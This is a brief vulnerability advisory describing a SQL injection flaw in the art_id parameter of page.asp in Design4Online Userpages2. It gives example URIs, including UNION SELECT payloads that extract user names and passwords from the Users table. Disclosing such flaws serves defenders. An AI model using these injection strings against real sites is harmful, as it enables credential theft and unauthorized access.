Design4Online Userpages2 Page.ASP SQL Injection Vulnerability

Design4Online Userpages2 Page.ASP SQL Injection Vulnerability

An attacker can exploit this issue via a web client.

The following example URIs are available:

http://www.example.com/page.asp?art_id=[SQL]
http://www.example.com/page.asp?art_id=-1+union+select+0,Name,2,3,4,5,6,7,8,9+from+Users+where+id=1
http://www.example.com/page.asp?art_id=-1+union+select+0,PassWord,2,3,4,5,6,7,8,9+from+Users+where+id=1